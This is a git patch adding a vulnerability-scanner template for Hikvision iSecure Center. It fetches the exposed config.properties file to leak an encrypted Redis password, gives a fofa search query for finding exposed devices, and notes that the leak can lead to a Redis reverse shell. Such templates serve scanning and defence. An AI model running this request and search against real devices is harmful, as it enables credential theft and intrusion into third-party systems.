From 051451c386cb3c7001387c80589c92b8a1b2a9ea Mon Sep 17 00:00:00 2001
From: r00t <24542600+adeljck@users.noreply.github.com>
Date: Wed, 24 Jul 2024 12:04:26 +0800
Subject: [PATCH] Add  hikvision-iSecure-info-leak.yaml

---
 .../hikvision-iSecure-info-leak.yaml          | 33 +++++++++++++++++++
 1 file changed, 33 insertions(+)
 create mode 100644 http/vulnerabilities/hikvision/hikvision-iSecure-info-leak.yaml

diff --git a/http/vulnerabilities/hikvision/hikvision-iSecure-info-leak.yaml b/http/vulnerabilities/hikvision/hikvision-iSecure-info-leak.yaml
new file mode 100644
index 0000000000..aadd8d4415
--- /dev/null
+++ b/http/vulnerabilities/hikvision/hikvision-iSecure-info-leak.yaml
@@ -0,0 +1,33 @@
+id: hikvision-iSecure-info-leak
+
+info:
+  name: zongheanfang-info-leak
+  author: adeljck
+  severity: critical
+  description: |
+    Hikvision iSecure Center /portal/conf/config.properties can get encrypted redis password,if server expose redis port.people can get a reverse shell with redis.
+  reference:
+    - https://github.com/adeljck/Hikvision_Info_Leak
+  metadata:
+    verified: true
+    max-request: 2
+    fofa-query: icon_hash="-808437027",app="HIKVISION-综合安防管理平台",title="综合安防管理平台",body="/portal/skin/ifar/blue/skin.css"
+  tags: infoleak,iot,hikvision
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/portal/conf/config.properties"
+    headers:
+      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
+      Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+      Accept-Encoding: gzip, deflate
+      Sec-Fetch-Dest: empty
+      Sec-Fetch-Mode: cors
+      Sec-Fetch-Site: same-origin
+      Te: trailers
+      Connection: close
+
+    matchers:
+      - type: word
+        words:
+          - 'password'
\ No newline at end of file